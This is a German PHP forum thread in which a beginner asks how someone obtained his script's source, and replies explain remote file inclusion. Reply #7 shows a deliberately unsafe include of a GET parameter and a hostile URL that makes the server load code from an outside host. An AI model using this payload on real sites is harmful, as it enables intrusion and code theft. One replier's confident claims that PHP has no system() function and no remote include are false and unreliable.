system(), include und linux: keinen plan

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • system(), include und linux: keinen plan

    Hallöchen Leute,
    ich bin ja ein ziemlicher anfänger in sachen PHP, in sachen Linux und Serverdinge habe ich noch überhaupt keine ahnung!

    Mir hat eben ein Bekannter teile von meinem Script präsentiert, die er von meinem Server hatte!!!

    Er meinte mein Script währe lausig programmiert (was wohl auch stimmt ) und deswegen konnte er das irgendwie rausbekommen!

    Er faselte die ganze zeit irgendwas von include, lokalem includen und externem, hat gesagt man muss sich da mit linux auskennen und mit dem system() befehl hätte das ganze auch noch zutun.

    Er wollte es mir aber nicht erklären, hat sich nur darüber lustig gemacht was für ein schlechter anfänger ich bin .

    Versteht das jetzt hier einer und kann mir erklären wie er nicht nur Dateien von meinem Server auspüren konnte, sondern auch noch den PHP code in die hände bekam?

    Kann mir einer sagen was für einen Fehler ich in meinem Script gemacht habe (es muss irgendwas mit include() zu tun haben) und wie ich das in zukunft verhindern kann?

    Danke im Vorraus,
    Gruß,
    Bigzed.

  • #2
    Es gibt keine system() Befehl...weder in Linux noch in PHP.

    Das könnte viele Ursachen haben aber mit Linux hat das 100%ig nix zu tun. Linux ist nicht der Webserver. Wenn dann hast du schlechte Zugriffsrechte in deinen Webordnern gesetzt, oder du hast nen FTP-Server laufen und kein richtiges Passwort.

    Aber solange deine Scripte laufen (und in <?php ?> stehn) kann man von aussen nicht drankommen...
    Auf jeden Fall hat dein Bekannter keinen Plan von Linux und versucht dich aufn Arm zu nehmen
    Übrigens gibts keinen extrenen include() Befehl

    extern is von ausserhalb und man kann kein PHP Script von ausserhalb einbinden, egal was dieser Kerl auch erzählt
    Welch triste Epoche, in der es leichter ist, ein Atom zu zertrümmern als ein Vorurteil!
    (Albert Einstein)

    Kommentar


    • #3
      Doch die funktion gibt es!
      http://de3.php.net/manual/de/function.system.php

      Ich habe meine CHMODS auf 777 gesetzt, heißt das vieleicht das auch andere auf meine Dateien zugreifen können? Dann liegt da warscheinlich der fehler.

      Bei externem include habe ich mich auch seehr gewundert, vieleicht habe ich ihn auch falsch verstanden.

      Warscheilnich sind die CHMODS daran schuld oder? Und die gibts ja auch nur bei Linux, vieleicht meinte er das damit.

      Kommentar


      • #4
        Komisch im PHP Handbuch gibts keinen Befehl system()
        Tut soweit ich das jetzt gelesen hab aber nix anderes als exec()...

        Und der muss ne Datei auf deinem System ham damit der den Befehl ausführen kann. Und das hat er ja hoffentlich nicht, also kann er diesen Befehl nicht benutzt haben, zumal der Befehl wirklich nich üblich ist. Normal benutzt man zu Programmaufrufen exec....
        Welch triste Epoche, in der es leichter ist, ein Atom zu zertrümmern als ein Vorurteil!
        (Albert Einstein)

        Kommentar


        • #5
          Nein hat er nicht und er konnte auf meine Dateien zugreifen!!!

          Da muss es irgendwas geben. Er meinte es hätte was mit include() zu tun da sollte ich nur lokale Dateien includen, sonst könnte er das machen!

          Kommentar


          • #6
            Konnte er nicht, zumindest nicht mit PHP...
            Wenn du deinen Server nicht abgesichert hast und er sich einlogen konnte hat das nix mit include zu tun...
            Welch triste Epoche, in der es leichter ist, ein Atom zu zertrümmern als ein Vorurteil!
            (Albert Einstein)

            Kommentar


            • #7
              Original geschrieben von Samson2k
              Konnte er nicht, zumindest nicht mit PHP...
              Wenn du deinen Server nicht abgesichert hast und er sich einlogen konnte hat das nix mit include zu tun...
              na aber ganz sicher !
              und das funktioniert genau mit include!

              Beispiel:

              PHP-Code:
              // schlechte Seite
              include($HTTP_GET_VARS['modul'].'.php'); 
              Aufruf der Seite:

              index.php?modul=falle

              böser Aufruf:
              index.php?modul=http://meinserver/meinboesesscript

              mein böses Script macht dann ein
              PHP-Code:
              echo "echo fread('index.php');"
              und zeigt mir somit das ganze Script index.php an

              TBT

              Die zwei wichtigsten Regeln für eine berufliche Karriere:
              1. Verrate niemals alles was du weißt!


              PHP 2 AllPatrizier II Browsergame

              Kommentar


              • #8
                Ja aber ich denke das niemand so leichtsinnig ist
                Welch triste Epoche, in der es leichter ist, ein Atom zu zertrümmern als ein Vorurteil!
                (Albert Einstein)

                Kommentar


                • #9
                  ... das denkst aber nur du!

                  Wir haben hier schon öfters Scripte "auseinander" genommen, die
                  genau so gearbeitet haben.
                  TBT

                  Die zwei wichtigsten Regeln für eine berufliche Karriere:
                  1. Verrate niemals alles was du weißt!


                  PHP 2 AllPatrizier II Browsergame

                  Kommentar


                  • #10
                    ohje das wird es wohl sein.

                    das heißt rein theoretisch konnte er auch auf meinem server schreiben...


                    Und was hat das ganze jetzt mit linux und system() zu tun????

                    Kommentar


                    • #11
                      überhaupt nix...so schlecht programmierte Scripte gehn auf jedem OS. Obwohl ich noch nie eins gesehn hab das so leichtsinnig war...

                      Theoretisch könnte er den system() Befehl einfügen und beliebige Kommandos eingeben.
                      Welch triste Epoche, in der es leichter ist, ein Atom zu zertrümmern als ein Vorurteil!
                      (Albert Einstein)

                      Kommentar

                      Lädt...
                      X